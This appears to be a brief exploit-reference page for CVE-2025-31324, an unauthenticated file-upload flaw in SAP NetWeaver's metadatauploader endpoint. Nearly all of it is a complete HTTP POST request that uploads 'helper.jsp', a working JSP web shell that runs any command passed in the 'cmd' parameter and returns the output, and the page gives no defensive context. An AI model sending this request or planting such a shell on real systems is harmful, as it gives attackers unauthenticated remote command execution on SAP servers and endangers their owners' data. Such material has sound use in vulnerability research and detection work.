SAP
CVE-2025-31324
SAP NetWeaver Unauthenticated - Upload vulnerability
Last updated
SAP NetWeaver Unauthenticated - Upload vulnerability
Last updated
POST /developmentserver/metadatauploader?CONTENTTYPE=MODEL&CLIENT=1 HTTP/1.1
Host: 127.0.0.1:8000
User-Agent: python-requests/2.32.3
Accept-Encoding: gzip, deflate, zstd
Accept: */*
Connection: keep-alive
Content-Length: 636
Content-Type: multipart/form-data; boundary=816121b0328c3864dc7963b2e0275e90
--816121b0328c3864dc7963b2e0275e90
Content-Disposition: form-data; name="file"; filename="helper.jsp"
Content-Type: application/octet-stream
<%@ page import="java.util.*,java.io.*"%>
<%
if (request.getParameter("cmd") != null) {
String cmd = request.getParameter("cmd");
Process p = Runtime.getRuntime().exec(cmd);
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while ( disr != null ) {
out.println(disr);
disr = dis.readLine();
}
}
%>
--816121b0328c3864dc7963b2e0275e90--